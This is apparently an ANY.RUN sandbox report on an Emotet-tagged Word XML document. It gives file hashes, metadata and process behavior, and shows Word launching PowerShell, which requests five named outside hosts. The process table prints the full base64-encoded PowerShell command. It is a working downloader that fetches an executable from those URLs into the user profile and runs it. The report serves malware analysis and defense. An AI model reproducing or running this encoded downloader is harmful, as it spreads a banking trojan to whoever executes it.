analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

012019

Full analysis: https://app.any.run/tasks/14f472fc-2fce-4ef2-89b3-a9db37df3f74
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: February 11, 2019, 11:31:53
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
emotet-doc
emotet
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:

2DA262595B2979B3160BAB0B7E919ED7

SHA1:

317EBB26A426888996DFBE4D6FD222F8C479644D

SHA256:

12CF31E593657B5F42E34BC27611AAA106111FD71F53A641439E9CA53368044D

SSDEEP:

3072:WoUupEHY0iB4sVej0KpghkfVdJvLuL76jJG+6RWajL/xSu90OoiLuDKZXfwKelj8:Qu0iojTgmj5LW76dl6RWIxUOmD+XfwLA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3188)

    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 3188)

  • SUSPICIOUS

    • Starts Microsoft Office Application

      • MSOXMLED.EXE (PID: 3032)

    • Creates files in the user directory

      • Powershell.exe (PID: 4008)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3188)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3188)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentBodySectSectPrDocGridLine-pitch: 360
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectPRT:
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://FnjuawG7BfBiB6
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictBinData: (Binary data 145376 bytes, use -b option to extract)
WordDocumentBodySectPRPictBinDataName: wordml://FnjuawG7BfBiB6
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRRsidRPr: 00E73302
WordDocumentBodySectPRsidRDefault: 00340AD4
WordDocumentBodySectPRsidR: 00340AD4
WordDocumentDocPrRsidsRsidVal: 00340AD4
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrViewVal: print
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentDocSuppDataBinData: (Binary data 115748 bytes, use -b option to extract)
WordDocumentDocSuppDataBinDataName: zriZRma
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleType: paragraph
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentDocumentPropertiesVersion: 16
WordDocumentDocumentPropertiesCharactersWithSpaces: 12
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesCharacters: 12
WordDocumentDocumentPropertiesWords: 1
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesLastSaved: 2019:02:08 21:27:00Z
WordDocumentDocumentPropertiesCreated: 2019:02:08 21:27:00Z
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesRevision: 1
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentOcxPresent: no
WordDocumentEmbeddedObjPresent: no
WordDocumentMacrosPresent: yes
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
34
Monitored processes
3
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start msoxmled.exe no specs winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3032"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\Downloads\012019.xml"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
XML Editor
Exit code:
0
Version:
14.0.4750.1000
3188"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\012019.xml"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEMSOXMLED.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4008Powershell -e JAB6AEUAdwBRAG4AQwBJAFIAPQAoACcAUAAnACsAJwBYADgANQAnACsAJwBVAFEAJwApADsAJAByAGoANwBkAFIAegBDAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEASABPADgAbgBqAD0AKAAnAGgAdAB0AHAAOgAvACcAKwAnAC8AbABpAHYAaQBuAGcAcwBvAGwAJwArACcAaQB0ACcAKwAnAHUAJwArACcAZABlAC4AYwBvAG0ALwAnACsAJwBIAFEAZgAnACsAJwBoAE4AUAA1AEkAQABoACcAKwAnAHQAdABwACcAKwAnADoALwAvACcAKwAnAGoAYQAnACsAJwBzACcAKwAnAHAAaQBuAGYAbwAnACsAJwByAG0AJwArACcAYQB0AGkAYwBhAC4AYwBvAG0ALwAnACsAJwBnAFYAUABzACcAKwAnAFYAMABQACcAKwAnAFMAUgBTAEAAaAB0AHQAcAA6AC8AJwArACcALwAnACsAJwBpAGQAaQBnAGkAdABvACcAKwAnAC4AbgBlAHQALwAyACcAKwAnAEYAbwA3ADIAJwArACcAVABpACcAKwAnAFoASgBAAGgAdAAnACsAJwB0AHAAOgAnACsAJwAvAC8AYgAnACsAJwBlAHoAJwArACcAbwBlAGsAYgBvAHMAJwArACcAbgBpACcAKwAnAGUALgBuAGwALwBMAFYAeQBRAGUAWAB0AFcAdQBAAGgAdAB0AHAAJwArACcAOgAvAC8AdwB3AHcALgBlAGwAcgBhAGMAbwBzAGUAYwByAGUAdAAuAGMAbwBtAC8AcgAnACsAJwBiADMAeABSAGQAYwAnACsAJwBoACcAKQAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAEgAZgBUAHMAMgBBAD0AKAAnAGoAJwArACcATAA0ADQARQAnACsAJwBrAFQARgAnACkAOwAkAFgAegBDAFYAQwBiADcAIAA9ACAAKAAnADUAJwArACcAOAA0ACcAKQA7ACQAagA4AEYAMwBqAFoAOABUAD0AKAAnAHUAcgAnACsAJwBFADcAUQB6AFgAJwApADsAJABhADcAawBIAEEAdwBmAEYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFgAegBDAFYAQwBiADcAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABMAE8ANgBmAGgATQA5ACAAaQBuACAAJABhAEgATwA4AG4AagApAHsAdAByAHkAewAkAHIAagA3AGQAUgB6AEMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQATABPADYAZgBoAE0AOQAsACAAJABhADcAawBIAEEAdwBmAEYAKQA7ACQASwB3AFIANQBaADcAPQAoACcAQwBzAEUAMgAnACsAJwBVACcAKwAnAGMAJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAYQA3AGsASABBAHcAZgBGACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAYQA3AGsASABBAHcAZgBGADsAJABMAEQAbgB3AFQANQBxAD0AKAAnAG0AJwArACcAaQB3ADgAegB6ACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABRAHAAMwBZAEQAcAA2AD0AKAAnAHYAJwArACcAbABJACcAKwAnAG4AaQBPACcAKQA7AA== C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 807
Read events
1 337
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
3
Unknown types
4

Dropped files

PID
Process
Filename
Type
3188WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR910B.tmp.cvr
MD5:
SHA256:
4008Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HJGRWSJITMHCZ1Q20CM6.temp
MD5:
SHA256:
3188WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:ED4638159C8132F5881606F81D9BFB26
SHA256:4DBB54509C1C320B95F75A27B635607E708D6687BB338384D746111A954363C6
4008Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3188WINWORD.EXEC:\Users\admin\Downloads\~$012019.xmlpgc
MD5:C98BA3032057F4FF1C3E7A0D655CA853
SHA256:F302B68F2A7BB7BA0B5EF8C881E2ED0DC4D4EC5AB3B57694AEEC5EDBD90950D0
3188WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:452C2E415BDEC8F0A66AA261343879C7
SHA256:C1FF214A3D3982240AE07BAFA967EC163F42B71836EEFCA8B40643409E15BA66
4008Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199e88.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3188WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:0EEF784156D86D740E021CD8FCDA16AB
SHA256:2BAC979A3D76236E6FE2843C6D7465756E5520F0FF009CDD053A367944AD6507
3188WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\012019.xml.LNKlnk
MD5:E44A8FC8CB19F26354013AFB025144B0
SHA256:1940AC40E115EE0DAEEE328502535821B86DEAE031CAD355F02DB2A251CBD76C
3188WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C65F31A6.tmpimage
MD5:9BB8E2D4C89DACA05D89D8028BA9E420
SHA256:9179CA7577140FF08D227B1A48AAC7C8EDCE5B7E8CB2D8A7369F9D79228D6AA9
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4008
Powershell.exe
GET
404
162.244.94.162:80
http://idigito.net/2Fo72TiZJ
US
xml
345 b
unknown
4008
Powershell.exe
GET
404
178.62.120.82:80
http://livingsolitude.com/HQfhNP5I
GB
xml
345 b
suspicious
4008
Powershell.exe
GET
404
86.109.170.198:80
http://jaspinformatica.com/gVPsV0PSRS
ES
xml
345 b
malicious
4008
Powershell.exe
GET
404
185.182.57.120:80
http://bezoekbosnie.nl/LVyQeXtWu
NL
xml
345 b
suspicious
4008
Powershell.exe
GET
404
209.240.96.46:80
http://www.elracosecret.com/rb3xRdch
US
xml
345 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4008
Powershell.exe
209.240.96.46:80
www.elracosecret.com
Turnkey Internet Inc.
US
malicious
4008
Powershell.exe
178.62.120.82:80
livingsolitude.com
Digital Ocean, Inc.
GB
suspicious
4008
Powershell.exe
86.109.170.198:80
jaspinformatica.com
Abansys & Hostytec, S.L.
ES
malicious
4008
Powershell.exe
162.244.94.162:80
idigito.net
FranTech Solutions
US
unknown
4008
Powershell.exe
185.182.57.120:80
bezoekbosnie.nl
Astralus B.V.
NL
suspicious

DNS requests

Domain
IP
Reputation
livingsolitude.com
  • 178.62.120.82
suspicious
jaspinformatica.com
  • 86.109.170.198
unknown
idigito.net
  • 162.244.94.162
unknown
bezoekbosnie.nl
  • 185.182.57.120
suspicious
www.elracosecret.com
  • 209.240.96.46
unknown

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
012019